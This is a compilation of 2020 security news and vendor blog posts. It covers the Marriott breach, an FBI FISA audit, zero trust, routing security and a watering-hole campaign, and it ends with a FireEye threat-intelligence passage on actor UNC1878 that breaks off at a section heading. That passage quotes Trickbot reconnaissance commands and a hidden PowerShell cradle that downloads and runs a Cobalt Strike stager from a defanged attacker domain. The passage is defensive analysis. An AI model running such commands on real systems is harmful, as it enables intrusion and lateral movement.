Trickbot: A primer

In recent years, the modular banking trojan known as Trickbot has evolved to become one of the most advanced trojans in the threat landscape. It has gone through a diverse set of changes since it was first discovered in 2016, including adding features that focus on Windows 10 and modules that target point of sale (POS) systems. Not only does it function as a standalone trojan, Trickbot is also commonly used as a dropper for other malware such as the Ryuk ransomware. The wide range of functionality allows this malware to adapt to different environments and maximize effectiveness in a compromised network.

Read More >>

The post Trickbot: A primer appeared first on Cisco Blogs.

Phishing Campaigns Leverage Latest COVID-19 Themes

Researchers Issue Warnings After Malicious Messages Tied to Economic Stimulus Plans Surface
With the U.S. and other nations adopting economic stimulus packages as a result of the global COVID-19 pandemic, fraudsters are now using the promise of government checks as phishing lures to spread banking Trojans, according to a pair of new security research reports.

Marriott discloses data breach impacting up to 5.2 Million guests

Marriott disclosed a new security breach detected at the end of February 2020 that could impact up to 5.2 million of its guests.

Marriott International discloses a data breach that exposed the personal information of roughly 5.2 million hotel guests, the incident was detected at the end of February 2020.

“At the end of February 2020, we identified that an unexpected amount of guest information may have been accessed using the login credentials of two employees at a franchise property. We believe this activity started in mid-January 2020.” reads the data breach notification published by the company. “Upon discovery, we confirmed that the login credentials were disabled, immediately began an investigation, implemented heightened monitoring, and arranged resources to inform and assist guests.”

The following information may have been involved:

  • Contact Details (e.g., name, mailing address, email address, and phone number)
  • Loyalty Account Information (e.g., account number and points balance, but not passwords)
  • Additional Personal Details (e.g., company, gender, and birthday day and month)
  • Partnerships and Affiliations (e.g., linked airline loyalty programs and numbers)
  • Preferences (e.g., stay/room preferences and language preference)

The investigation is still ongoing, at the time Marriott confirmed that it is not aware of exposure of the information involved, such as Marriott Bonvoy account passwords or PINs, payment card information, passport information, national IDs, or driver’s license numbers.

Guests could check whether they have been impacted by the security breach by visiting the online portal set up by the company.

The company also disabled and forced the reset of the passwords of Marriott Bonvoy members impacted in the incident, it also prompted to enable multi-factor authentication.

Marriott is notifying affected individuals and it is offering them free identity protection services for one year.

In November 2018, the company announced that hackers compromised guest reservation database at its subsidiary Starwood hotels and stolen personal details of about 500 million guests.

Pierluigi Paganini

(SecurityAffairs – Marriott, hacking)

The post Marriott discloses data breach impacting up to 5.2 Million guests appeared first on Security Affairs.

OIG Lacks Confidence in FBI’s Adherence to Woods Procedures

OIG Lacks Confidence in FBI's Adherence to Woods Procedures

The Office of the Inspector General (OIG) has said it lacks confidence that the Federal Bureau of Investigation is executing its Woods Procedures in line with FBI policy when applying for court permission to surveil people in the United States. 

The FBI implemented its Woods Procedures in 2001 following errors in numerous Foreign Intelligence Surveillance Act (FISA) applications submitted to the Foreign Intelligence Surveillance Court (FISC) in FBI counterterrorism investigations. The procedures, named for FBI agent Michael Woods, who helped devise them, require that every fact submitted in support of a wiretap application must be verified.

FBI policy requires case agents who will be requesting the FISA application to create and maintain a "Woods File" that contains supporting documentation for every factual assertion contained in the application together with the results of required database searches and other verifications.

report published by the OIG on March 30 states that a recent audit of the FBI found that in some FISA applications, Woods Files had gone missing or may not have ever existed.

Over the past two months, auditors visited 8 FBI field offices and reviewed a judgmentally selected sample of 29 applications relating to US persons and involving both counterintelligence and counterterrorism investigations. 

The OIG report states that "we could not review original Woods Files for 4 of the 29 selected FISA applications because the FBI has not been able to locate them and, in 3 of these instances, did not know if they ever existed." 

In all 25 of the FISA applications the OIG were able to review, auditors identified errors or inadequately supported facts.

The OIG said: "For all 25 FISA applications with Woods Files that we have reviewed to date, we identified facts stated in the FISA application that were: (a) not supported by any documentation in the Woods File, (b) not clearly corroborated by the supporting documentation in the Woods File, or (c) inconsistent with the supporting documentation in the Woods File."

The auditors' findings led the OIG to conclude that the FBI's FISA applications were not as accurate as they should be.

"We believe that a deficiency in the FBI’s efforts to support the factual statements in FISA applications through its Woods Procedures undermines the FBI’s ability to achieve its 'scrupulously accurate' standard for FISA applications," stated the OIG.

The AWS Service to Focus On – Amazon EC2

cloud services

If we run a contest for Mr. Popular of Amazon Web Services (AWS), without a doubt Amazon Simple Storage Service (S3) has ‘winner’ written all over it. However, what’s popular is not always what is critical for your business to focus on. There is popularity and then there is dependability. Let’s acknowledge how reliant we are on Amazon Elastic Cloud Computing (EC2) as AWS infrastructure led-organizations.

We reflected upon our in-house findings for the AWS ‘Security’ pillar in our last blog, Four Reasons Your Cloud Security is Keeping You Up at Night, explicitly leaving out over caffeination and excessive screen time!

Drilling further down to the most affected AWS Services, Amazon EC2 related issues topped the list with 32% of all issues. Whereas Mr. Popular – Amazon S3 contributed to 12% of all issues. While cloud providers, like AWS, offer a secure infrastructure and best practices, many customers are unaware of their role in the shared responsibility model. The results showing the number of issues impacting Amazon EC2 customers demonstrates the security gap that can happen when the customer part of the shared responsibility model is not well understood.

While these AWS services and infrastructure are secure, customers also have a responsibility to secure their data and to configure environments according to AWS best practices. So how do we ensure that we keep our focus on this crucial service and ensure the flexibility, scalability, and security of a growing infrastructure?

Introducing Rules

If you thought you were done with rules after passing high school and moving out of your parent’s house, you would have soon realized that you were living a dream. Rules seem to be everywhere! Rules are important, they keep us safe and secure. While some may still say ‘rules are made to be broken’, you will go into a slump if your cloud infrastructure breaks the rules of the industry and gets exposed to security vulnerabilities.

It is great if you are already following the Best Practices for Amazon EC2, but if not, how do you monitor the performance of your services day in and day out to ensure their adherence to these best practices? How can you track if all your services and resources are running as per the recommended standards?

We’re here to help with that. Trend Micro Cloud One – Conformity ‘Rules’ provide you with that visibility for some of the most critical services like Amazon EC2.

What is the Rule?

A ‘Rule’ is the definition of the best practice used as a basis for an assessment that is run by Conformity on a particular piece of your Cloud infrastructure. When a rule is run against the infrastructure (resources) associated with your AWS account, the result of the scan is referred to as a Check. For example, an Amazon EC2 may have 60 Rules (Checks) scanning for various risks/vulnerabilities. Checks are either a SUCCESS or a FAILURE.

Conformity has about 540 Rules and 60 of them are for monitoring your Amazon EC2 services best practices. Conformity Bot scans your cloud accounts for these Rules and presents you with the ‘Checks’ to prioritize and remediate the issues keeping your services healthy and prevent security breaches.

Amazon EC2 Best Practices and Rules

Here are just a few examples of how Conformity Rules have got you covered for some of the most critical Amazon EC2 best practices:

  1. To ensure Security, ensure IAM users and roles are used and management policies are established for access policies.
  2. For managing Storage, keep EBS volumes separate for operating systems and data, and check that the Amazon EC2 instances provisioned outside of the AWS Auto Scaling Groups (ASGs) have Termination Protection safety feature enabled to protect your instances from being accidentally terminated.
  3. For efficient Resource Management, utilize custom tags to track and identify resources, and keep on top of your stated Amazon EC2 limits.
  4. For full confident Backup and Recovery, regularly test the process of recovering instances and EBS volumes should they fail, and create and use approved AMIs for easier and consistent future instance deployment.

See how Trend Micro can support your part of the shared responsibility model for cloud security: https://www.trendmicro.com/cloudconformity.

Stay Safe!

The post The AWS Service to Focus On – Amazon EC2 appeared first on .

Marriott Hotel chain hit by hackers – again

Sixteen months after acknowledging a huge data, breach Mariott Hotels says it has been stung again, this time after login credentials of two employees were used.

The chain said this morning that it has begun notifying some 5.2 million guests who stayed at its hotels in several countries, including Canada, the U.S., the United Kingdom, that they were victims of the breach.

Stolen personal information includes names, addresses, email addresses, birthdates. At the moment, the company doesn’t think payment card information passport numbers, national IDs or driver’s licences were copied.

In a statement, the chain said that the hackers accessed an application used to help provide services to guests at hotels. At the end of February, it realized an unexpected amount of guest information might have been accessed using the login credentials of two employees at a franchised Marriott hotel. “We believe this activity started in mid-January 2020. Upon discovery, we confirmed that the login credentials were disabled, immediately began an investigation, implemented heightened monitoring, and arranged resources to inform and assist guests.”

At this point Mariott says it thinks that the following information may have been involved in the breach, although not all of it was copied for every guest:

  • Contact Details (e.g., name, mailing address, email address, and phone number)
  • Loyalty Account Information (e.g., account number and points balance, but not passwords)
  • Additional Personal Details (e.g., company, gender, and birthday day and month)
  • Partnerships and Affiliations (e.g., linked airline loyalty programs and numbers)
  • Preferences (e.g., stay/room preferences and language preference)

In November 2018 Marriott admitted that it had been victimized by a hack of the computer system of the company’s Starwood chain. The chain included W Hotels, St. Regis, Sheraton Hotels & Resorts, Westin Hotels & Resorts, Element Hotels, Aloft Hotels, The Luxury Collection, Tribute Portfolio, Le Méridien Hotels & Resorts, Four Points by Sheraton and Design Hotels) which Marriott had bought several years before. Approximately 383 million records of those who stayed or made reservations at Starwood properties were involved, but that includes multiple records for the same guest.

Approximately 8.6 million encrypted payment cards were copied over four years in that breach.  Of those, the vast majority had expired by September 2018, when the breach was discovered. Approximately 354,000 cards were unexpired as of September 2018.  But the theft also involved some 5.25 million unencrypted passport numbers, as well as roughly 20.3 million encrypted passport numbers.

Consumers should note that Marriott is sending notification messages from marriott@email-marriott.com. Messages from other accounts should be treated as fraudulent. It is common for hackers to try to take advantage of data breach announcements by sending fake messages with malicious links to infect computers. Where available, Marriott is offering victims the option to enroll in a personal information monitoring service free of charge for one year.

Tim Erlin, Tripwire’s vice-president of product management and strategy, noted that while the Marriott release had a lot of information for consumers, it offers little for security practitioners to better understand how to avoid similar incidents. “Breaches that use valid credentials can be harder to detect because the attack looks like a valid login,” he added. “In these cases, organizations often have to look at what changes that attacker is making as they carry out their objective in order to detect the malicious activity.”

 

Making it easier for your remote workforce to securely access all the apps they need, from anywhere

Since I published my last blog, Five identity priorities for 2020, COVID-19 has upended the way we work and socialize. Now that physical distancing has become essential to protect everyone’s health, more people than ever are going online to connect and get things done. As we all adjust to a new daily routine, the organizations we work for are turning to technology to help us collaborate and stay productive. In these challenging times, identity can make life simpler, both for people working from home and for IT administrators charged with keeping their environments secure.

In my previous blog, I advised connecting all applications and cloud resources to Azure Active Directory (Azure AD). If you’re like most organizations, your employees use a lot of apps, from popular software-as-a-service (SaaS) apps—including collaboration services like Zoom, Cisco Webex, Workplace from Facebook, or Box—to legacy web and on-premises applications. Making Azure AD the control plane across all your apps helps ensure your employees working from home have secure, seamless access to the tools and resources they need, while protecting those tools and resources from unauthorized access.

Making it easy for remote workers to access the apps they need

When you connect your apps to Azure AD, your employees only need to sign in once to access them, and they only need one set of credentials. To make on-premises web apps available without a cumbersome VPN, you can use Azure AD Application Proxy, while tools from our secure hybrid access partners like can provide access to. To get productive from wherever they are, your employees simply go to the My App Portal, where they can find all the apps they have your permission to use.

Screenshot showing apps in the My Apps portal.

Figure 1: Users can sign in once and access all the apps they need in a central place, the My Apps portal.

Enabling consistent, strong security across all your apps

With Azure AD, enabling productivity doesn’t shortchange security. Once you’ve connected your apps to Azure AD, you can apply custom security policies across your entire digital estate. Since even complex passwords get stolen, we recommend enforcing multi-factor authentication (MFA) for all accounts and applying Conditional Access policies for adaptive granular access controls. For example, when a user signs in, policies can determine whether to allow, limit, or block access based on their location, whether their device is compliant, and which app they’re trying to access.

Additionally, Microsoft Intune App Protection Policies can provide application-level controls and compliance, while maintaining a great user experience on any device. Intune app configuration policies can help keep work data safe by controlling or stopping people from sharing work data outside of trusted apps assigned to them.

Increasing IT efficiency with self-service and automation​

To reduce the burden on IT, Azure AD offers several tools to simplify management. Self-Service Password Reset lets users manage passwords on their own. Pre-integrated applications make it easy to enable single sign-on (SSO) with just a few clicks (Figure 2). Some companies, to help serve their communities. Automated provisioning of user accounts and apps makes onboarding significantly faster, so those new workers can get productive right away. For one customer, Mattress Firm, adding a new employee to their HR system automatically provisions their Azure AD user account and assigns them access to the appropriate applications within four hours.

Screenshot showing apps in the Azure AD Gallery.

Figure 2: Configure your apps for secure, seamless access with just a couple clicks.

Get free assistance connecting your apps to Azure AD

Many of our customers are moving rapidly to enable secure remote work during this current crisis, and we want to make sure you have everything you need. If you have subscriptions to Office 365 or Azure, you can use Azure AD to configure secure SSO for your 10 most critical apps for free. A license for Microsoft 365 gives you full access to Azure AD. For all our customers, we also offer complimentary deployment assistance through our FastTrack program.

As unprecedented numbers of people work remotely, the right tools, including Azure AD, can help keep them both protected and productive. Whatever your circumstances, we’re here to help. You can reach us via Twitter: @AzureAD.

Learn more

Learn how to use Azure AD to connect your workforce to all the apps they need from anywhere.

 

*This offer includes MFA via the Microsoft Authenticator app only.

The post Making it easier for your remote workforce to securely access all the apps they need, from anywhere appeared first on Microsoft Security.

MariaDB SkySQL: Deploy production databases for mission-critical applications running in the cloud

MariaDB announced the immediate availability of MariaDB SkySQL, the first database-as-a-service (DBaaS) to unlock the full power of MariaDB Platform for transactions, analytics or both, and optimized with a cloud-native architecture. SkySQL delivers the “MariaDB in the cloud” experience customers have been waiting for – fully featured, fully customizable and backed by world-class support and database expertise from the source, the engineers who built it. “The universal need for accessible yet robust database services has … More

The post MariaDB SkySQL: Deploy production databases for mission-critical applications running in the cloud appeared first on Help Net Security.

Marriott Suffers Second Breach Exposing Data of 5.2 Million Hotel Guests

International hotel chain Marriott today disclosed a data breach impacting nearly 5.2 million hotel guests, making it the second security incident to hit the company in recent years. "At the end of February 2020, we identified that an unexpected amount of guest information may have been accessed using the login credentials of two employees at a franchise property," Marriott said in a

Content delivery networks, cloud providers can now join routing security group

Google, Facebook, Microsoft, Netflix and Cloudflare are among the big-name companies that have joined an industry-led initiative to reduce the ability of threat actors to abuse the internet’s global routing system for cyber attacks.

The Internet Society said today that those providers and others have agreed to follow the Mutually Agreed Norms For Routing Security (MANRS) after content delivery networks (CDNs) and cloud providers were allowed to join. Until now MANRS was limited to network operators and internet exchange points.

Briefly, MANRS members agree to shore up the security of routing and signalling so threat actors can’t manipulate the ways traffic is routed and launch threats such as distributed denial of service attacks.

Related:

MANRS releases tool to help with compliance

Content and delivery networks and cloud providers don’t exchange packets with other networks, said Andrei Robchevsky, senior technology program manager at the Internet Society. But, he added, “they connect with a lot of networks on the internet. Everyone wants to peer with a cloud network or a CDN. So the idea is can we leverage their peering power and facilitate some of the improvements in the routing system.

“Big content and cloud providers usually have thousands of networks connecting to them. If they only encourage hygiene and raise awareness of routing security issues among thousands of networks we can’t reach, to actually put filters in place preventing them from emitting incorrect routing information, we expect it will have a big effect.”

MANRS was founded in late 2014 and counts 275 network operators and 45 internet exchange points as members. Canada’s biggest network providers — Bell, Rogers and Telus — have yet to join. U.S. providers who are members include Comcast, a huge cable provider, but not AT&T or Verizon.

Canadian members include the Canarie national university research network, Alberta’s Cybera research network and Quebec’s RISQ network, as well as internet exchange providers TorIX (Toronto), YYCIX (Calgary), YXEIX (Saskatoon), and QIX (Montreal).

Related:

Canadian IXPs join MANRS

In January the World Economic Forum issued a report urging internet service providers to join MANRS.

There are at least 60,000 independent networks that comprise the internet. They exchange what is called reachability information among themselves using the BGP (Border Gateway Protocol) standard. Each network builds its own “map” or routing table of the internet they use to decide where to forward packets. However, the databases of the information held by operators aren’t always accurate. That can cause networks to be hijacked, in addition to service outages.

The Internet Society estimated that in 2017 there were 14,000 routing outages or incidents, including hijacking, leaks, spoofing and large-scale Denial of Service (DoS) attacks.

The MANRS rules encourage members to help prevent the spread of incorrect routing information by filtering announcements in their route servers.

Content delivery networks and cloud providers who sign up agree to follow six actions to improve the resilience and security of the routing infrastructure:

  • Prevent propagation of incorrect routing information
  • Prevent traffic of illegitimate source IP addresses
  • Facilitate global operational communication and co-ordination
  • Facilitate validation of routing information on a global scale
  • Encourage MANRS adoption
  • Provide monitoring and debugging tools to peering partners (optional)

Phishing Campaigns Leverage New COVID-19 Themes

Researchers Issue Warnings After Malicious Messages Tied to Economic Stimulus Plans Surface
With the U.S. and other nations adopting economic stimulus packages as a result of the global COVID-19 pandemic, fraudsters are now using the promise of government checks as phishing lures to spread banking Trojans, according to a pair of new security research reports.

Marriott International confirms data breach of up to 5.2 million guests

Marriott International has today announced that it has suffered a data breach affecting up to 5.2 million people. The hotel chain says it uses an application to help provide services to its guests. Beginning mid-January this year, the login credentials of two employees at a franchised property were used to access guest information on this […]

New Marriott Data Breach Affects 5.2 Million Guests

New Marriott Data Breach Affects 5.2 Million Guests

Hotel chain Marriott International announced today that it has suffered a second data breach.

According to an incident notification published on their website, the company spotted unusual activity occurring in an app that guests use to access services during their stay. 

An investigation into the activity revealed that the login credentials of two Marriott employees had been used to access "an unexpected amount" of guest information.

Marriott said guest data that may have been compromised in the breach included contact details, loyalty account information, personal details such as birth dates, and information concerning linked partnerships and affiliations like airline loyalty programs. 

Precisely what information was accessed varied from guest to guest, but in some cases email addresses, phone numbers, and employer details were exposed. 

Marriott said: "At the end of February 2020, we identified that an unexpected amount of guest information may have been accessed using the login credentials of two employees at a franchise property. We believe this activity started in mid-January 2020."

While the investigation into the data breach is ongoing, Marriott said that "we currently have no reason to believe that the information involved included Marriott Bonvoy account passwords or PINs, payment card information, passport information, national IDs, or driver’s license numbers."

On March 31, 2020, Marriott sent emails about the incident to guests involved. The hotel chain has offered guests affected by the incident a year's worth of personal information monitoring from IdentityWorks free of charge. 

Marriott said: "We have also set up a self-service online portal for guests to be able to determine whether their information was involved in the incident and, if so, what categories of information were involved." 

This latest data breach has affected approximately 5.2 million Marriott guests. The hotel chain has advised Marriott Bonvoy account holders to change account passwords and to monitor their accounts for suspicious activity.

In November 2018, Marriott reported a data breach that saw the records of approximately 339 million guests exposed. In a catastrophic and ongoing cybersecurity incident, threat actors were found to have had unauthorized access to the hotel's Starwood network since 2014.  

Holy water targets religious figures and charities in Asia

Holy Water – An APT group compromised a server hosting Web pages belonging mainly to religious figures and charities to carry out watering hole attacks.

On December 4, 2019, Kaspersky experts discovered a watering hole attack, tracked Holy Water, aimed at an Asian religious and ethnic group. The campaign has been active since at least May 2019 and hit delivered fake Adobe Flash update warnings to the victims.

The experts believe that threat actors have been evolving, they were observed employing Sojson obfuscation, NSIS installer, Python, open-source code, GitHub distribution, Go language, as well as Google Drive-based C2 channels in their campaigns.

At the time it is still unclear the real target of the attacks.

“The watering holes have been set-up on websites that belong to personalities, public bodies, charities and organizations of the targeted group. At the time of writing, some of these websites (all hosted on the same server) are still compromised, and continue to direct selected visitors to malicious payloads.” reads the analysis published by Kaspersky Lab.

When a user visits one of the watering hole websites, a compromised embedded resource will load a malicious JavaScript hosted by one of the water-holed websites that gathers info on the visitor and determine whether it is a target.

If the visitor is a potential target, the attack chain starts, the JavaScript will load a second script that triggers the drive-by download attack displaying the victims a fake update pop-up.

The visitor is then tricked into installing the fake update that hides a malicious installer package that will set up a backdoor.

The analysis of the JavaScript script involved in the attack suggests that attackers might also target MacOS users.

Attackers used GitHub as the repository for the malicious executables employed in the attacks, GitHub disabled the repository on February 14 after Kaspersky reported it to them.

The repository has been online for more than nine months, GitHub provided the commit history, allowing the experts to gain a unique insight into the attacker’s activity and tools.

Experts found four executable hosted in the repository, an installer package, embedding a decoy legitimate Flash update and a stager, the Godlike12 Go backdoor that implements a Google Drive based C2 channel, and two versions of the open-source Stitch Python backdoor that were customized by the attackers.

“Digging into the repository for older commits, we also discovered a previous fake update toolset: a C installer bundling the legitimate Flash installer and a vanilla Stitch backdoor, as well as a C++ infostealer that collects information about host computers (OS version, IP address, hostname) and sends them over HTTP/S.” continues Kaspersky.

Experts noticed that attackers used a low-budget toolset but they spend a significant effort to evolve it.

“With almost 10 compromised websites and dozens of implanted hosts (that we know of), the attackers have set up a sizable yet very targeted water-holing attack. The toolset that’s being used seems low-budget and not fully developed, but has been modified several times in a few months to leverage interesting features like Google Drive C2, and would be characteristic of a small, agile team.” concludes Kaspersky.

“We were unable to observe any live operations, but some tracks indicate that the Godlike12 backdoor is not widespread, and is probably used to conduct reconnaissance and data-exfiltration operations. We were unable to correlate these attacks to any known APT groups.”

Pierluigi Paganini

(SecurityAffairs – Holy Water, malware)

The post Holy water targets religious figures and charities in Asia appeared first on Security Affairs.

Zero chance of tackling zero trust without a platform approach

Zero trust has gone mainstream. Everyone’s either promoting the concept, offering solutions to address the challenge, or just wanting to understand what it’s all about. And that’s the trouble: it means different things to different people, especially the word “trust,” which is a loaded term in security.

Just as we don’t trust hackers and cybercriminals, we do want to trust our employees, contractors, and business partners, don’t we? How do we succeed in business, after all, without trusting our users and guests to seamlessly access our data and resources?

That’s actually where zero trust comes in. We permit users to access the resources they need to get their jobs done. We try to stay out of our users’ way when we can. And we don’t do so blindly. We put safeguards in place to make sure users don’t leverage their access for wrongdoing, and that outsiders don’t usurp that access to carry out attacks.

As discussed on a recent security podcast, while zero trust is not new, it is now moving from the realm of hype to a pragmatic, accepted standard. In fact, Cisco was recently named a leader in the 2019 Forrester Zero Trust Wave.

Don’t let just anyone into your home…

Think of it this way. We choose to let certain visitors into our homes, but we don’t let just anybody in. We make sure we know them first, or that they can prove they’re from the plumbing company we called, for example.

We have security cameras so we can watch what people are doing when they approach our home and door. We have locks on our doors, and fences and gates around our yards, so we can decide who gets in and out. And when people do come in, we often confine them to certain areas of the house.

In a nutshell, that’s what zero trust is for our computing environments. It’s a comprehensive approach to securing access across your networks, applications, and infrastructure – including access from users, computers, phones, IoT devices, cloud applications, and more.

 

Amidst today’s complex computing environment, security teams are losing visibility into and control over who and what is accessing their networks and data. According to our 2020 CISO Benchmark Report, 52 percent of respondents find mobile devices very or extremely challenging to defend. And, 52 percent also said that it is very or extremely challenging to secure data stored in the public cloud.

Traditional security solutions were based on the concept of a finite network perimeter. But with the evolution of today’s workplace, the perimeter has changed due to the introduction of technologies like cloud, mobile, and the internet of things (IoT). We can no longer base security on the location from which an access request originates – because today’s users and devices are everywhere.

Cisco Zero Trust

By verifying the validity of every access request, no matter which user, location, and device it comes from, zero trust ensures that only the right users and devices get access, and that attackers cannot move laterally across the network. However, not all zero trust models are created equal.

Cisco Zero Trust protects your workforce, workloads, and workplace.

Some zero trust solutions focus on just one component of your ecosystem, while Cisco Zero Trust offers comprehensive security across your workforce, workloads, and workplace, and dynamically adjusts to address new levels of risk. Cisco also extends zero trust across our security portfolio, and to third-party technologies, to enhance visibility and policy enforcement across your entire infrastructure.

In other words, your home security measures can protect your house and yard, but can they also secure the people, appliances, and other objects in and around your home?

Cisco Zero Trust video

Main components of Cisco Zero Trust

Zero trust is a framework and way of doing security, versus a single product or solution. That’s why vendors who want to sell you a single product to solve your zero trust challenges should be looked at with suspicion. Zero trust takes the precise coordination of people, processes, and technology to do it right. The key pillars of Cisco’s zero trust strategy include the following:

Secure your workforce

Duo Security secures your workforce, ensuring that only the right users and devices can access applications. It helps protect your users and their devices against stolen credentials, phishing, and other identity-based attacks. And, it verifies users’ identities and establishes device trust before granting access to applications – from any location.

According to Vivian Ho, Software Engineer at Lyft, “My team’s main objective is to design and build tools and services that help keep Lyft’s infrastructure and data safe, and we believe Duo is a trusted partner in this journey…we see Duo serving as a core technology building block to enable our zero trust security philosophy.”

Protect your workload

Cisco Tetration protects your workloads, securing all connections within your applications across data centers and multi-cloud environments. It contains breaches and minimizes lateral movement through application micro-segmentation.

“Tetration gives me 20/20 vision in the data center,” said Eugene Pretorius, CIO of Infrastructure and Security at First National Bank. “It’s the only tool in the world that can show what is happening across the network, application, and server planes all on one screen.”

Defend your workplace

Cisco SD-Access segments your workplace, securing user and device connections across your network, including for IoT devices like cameras, manufacturing equipment, heart pumps, and more.

“With Cisco SD-Access, we can automate and apply segmentation and security policies to our network devices up to 10 times faster than before,” said Frank Weiler, who heads up the networking department for the City of Luxembourg.

Cisco SecureX – A platform approach to zero trust

The above technologies work together, and with other Cisco and third-party technologies, through our platform approach to security – SecureX. Today’s security professionals can no longer get by with siloed technologies. With SecureX, the whole is greater than the sum of its parts as multiple security technologies are integrated to share information and work together as a team. Ninety-five percent of customers say SecureX is valuable for helping them take action and remediate threats.

Cisco SecureX is the industry’s broadest, most integrated security platform.

Much like the security sensors on the windows in your home can trigger an alarm, which alerts your home security provider, who can call the police – SecureX seamlessly unifies visibility, enables automation, and strengthens security across network, endpoint, cloud, and applications. It’s all about greater simplicity and better security.

At the heart of our platform approach is the belief that security solutions should learn from one another and respond as a coordinated unit. And, that security should be built in versus bolted on, making it more holistic and effective. With this kind of strategy, implementing zero trust becomes less of a manual, onerous process, and more of an invisible, yet powerful means of protecting your environment – reducing the attack surface and accelerating incident response.

Get started with zero trust

Protect your network like you protect your home. Go to cisco.com/go/zero-trust and cisco.com/go/securex for further details.

The post Zero chance of tackling zero trust without a platform approach appeared first on Cisco Blogs.

It’s Your Money and They Want It Now — The Cycle of Adversary Pursuit

When we discover new intrusions, we ask ourselves questions that will help us understand the totality of the activity set.

How common is this activity? Is there anything unique or special about this malware or campaign? What is new and what is old in terms of TTPs or infrastructure? Is this being seen anywhere else? What information do I have that substantiates the nature of this threat actor?

To track a fast-moving adversary over time, we exploit organic intrusion data, pivot to other data sets, and make that knowledge actionable for analysts and incident responders, enabling new discoveries and assessments on the actor. The FireEye Advanced Practices team exists to know more about the adversary than anyone else, and by asking and answering questions such as these, we enable analyst action in security efforts. In this blog post, we highlight how our cycle of identification, expansion, and discovery was used to track a financially motivated actor across FireEye’s global data sets.

Identification

On January 29, 2020, FireEye Managed Defense investigated multiple TRICKBOT deployments against a U.S. based client. Shortly after initial deployment, TRICKBOT’s networkDll module ran the following network reconnaissance commands (Figure 1).

ipconfig /all
net config workstation
net view /all
net view /all /domain
nltest /domain_trusts
nltest /domain_trusts /all_trusts

Figure 1: Initial Reconnaissance

Approximately twenty minutes after reconnaissance, the adversary ran a PowerShell command to download and execute a Cobalt Strike HTTPS BEACON stager in memory (Figure 2).

cmd.exe /c powershell.exe -nop –w hidden –c “IEX ((new-object net.webclient).downloadstring(‘hxxps://cylenceprotect[.]com:80/abresgbserthgsbabrt’))”

Figure 2: PowerShell download cradle used to request a Cobalt Strike stager

Six minutes later, Managed Defense identified evidence of enumeration and attempted lateral movement through the BEACON implant. Managed Defense alerted the client of the activity and the affected hosts were contained, stopping the intrusion in its tracks. A delta of approximately forty-six minutes between a TRICKBOT infection and attempted lateral movement was highly unusual and, along with the clever masquerade domain, warranted further examination by our team.

Although light, indicators from this intrusion were distinct enough to create an uncategorized threat group, referred to as UNC1878. At the time of initial clustering, UNC1878’s intent was not fully understood due to the rapid containment of the intrusion by Managed Defense. By creating this label, we are able to link activity from the Managed Defense investigation into a single entity, allowing us to expand our understanding of this group and track their activity over time. This is especially important when dealing with campaigns involving mass malware, as it helps delineate the interactive actor from the malware campaign they are leveraging. For more information on our clustering methodology, check out our post about how we analyze, separate, or merge these clusters at scale.

Expansion

Pivoting on the command and control (C2) domain allowed us to begin building a profile of UNC1878 network infrastructure. WHOIS records for cylenceprotect[.]com (Figure 3) revealed that the domain was registered on January 27, 2020, with the registrar "Hosting Concepts B.V. d/b/a Openprovider", less than two days before we saw this domain used in activity impacting the Managed Defense customer.

Domain Name: cylenceprotect.com
Registry Domain ID: 2485487352_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.registrar.eu
Registrar URL: http://www.registrar.eu
Updated Date: 2020-01-28T00:35:43Z
Creation Date: 2020-01-27T23:32:18Z
Registrar Registration Expiration Date: 2021-01-27T23:32:18Z
Registrar: Hosting Concepts B.V. d/b/a Openprovider

Figure 3: WHOIS record for the domain cylenceprotect[.]com

Turning our attention to the server, the domain resolved to 45.76.20.140, an IP address owned by the VPS provider Choopa. In addition, the domain used self-hosted name servers ns1.cylenceprotect[.]com and ns2.cylenceprotect[.]com, which also resolved to the Choopa IP address. Network scan data for the server uncovered a certificate on port 80 and 443, a snippet of which can be seen in Figure 4.

Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number:
            03:a8:60:02:c7:dd:7f:88:5f:2d:86:0d:88:41:e5:3e:25:f0
    Signature Algorithm: sha256WithRSAEncryption
        Issuer: C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3
        Validity
            Not Before: Jan 28 02:02:14 2020 GMT
            Not After : Apr 27 02:02:14 2020 GMT
        Subject: CN=cylenceprotect[.]com

Figure 4: TLS Certificate for the domain cylenceprotect[.]com

The certificate was issued by Let’s Encrypt, with the earliest validity date within 24 hours of the activity detected by Managed Defense, substantiating the speed in which this threat actor operates. Along with the certificate in Figure 4, we also identified the default generated, self-signed Cobalt Strike certificate (Figure 5) on port 54546 (50050 by default).

Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number: 1843990795 (0x6de9110b)
    Signature Algorithm: sha256WithRSAEncryption
        Issuer: C=Earth, ST=Cyberspace, L=Somewhere, O=cobaltstrike, OU=AdvancedPenTesting, CN=Major Cobalt Strike
        Validity
            Not Before: Jan 28 03:06:30 2020 GMT
            Not After : Apr 27 03:06:30 2020 GMT
        Subject: C=Earth, ST=Cyberspace, L=Somewhere, O=cobaltstrike, OU=AdvancedPenTesting, CN=Major Cobalt Strike

Figure 5: Default Cobalt Strike TLS Certificate used by UNC1878

Similar to the certificate on port 80 and 443, the earliest validity date was again within 24 hours of the intrusion identified by Managed Defense. Continuing analysis on the server, we acquired the BEACON stager and subsequent BEACON payload, which was configured to use the Amazon malleable C2 profile.

While these indicators may not hold significant weight on their own, together they create a recognizable pattern to fuel proactive discovery of related infrastructure. We began hunting for servers that exhibited the same characteristics as those used by UNC1878. Using third-party scan data, we quickly identified additional servers that matched a preponderance of UNC1878 tradecraft:

  • Domains typically comprised of generic IT or security related terms such as “update”, “system”, and “service”.
  • Domains registered with “Hosting Concepts B.V. d/b/a Openprovider" as early as December 19, 2019.
  • Self-hosted name servers.
  • Let’s Encrypt certificates on port 80.
  • Virtual private servers hosted predominantly by Choopa.
  • BEACON payloads configured with the Amazon malleable C2 profile.
  • Cobalt Strike Teams Servers on non-standard ports.

Along with certificates matching UNC1878 tradecraft, we also found self-signed Armitage certificates, indicating this group may use multiple offensive security tools.

Pivoting on limited indicators extracted from a single Managed Defense intrusion, a small cluster of activity was expanded into a more diverse set of indicators cardinal to UNC1878. While the objective and goal of this threat actor had not yet manifested, the correlation of infrastructure allowed our team to recognize this threat actor’s operations against other customers.

Discovery

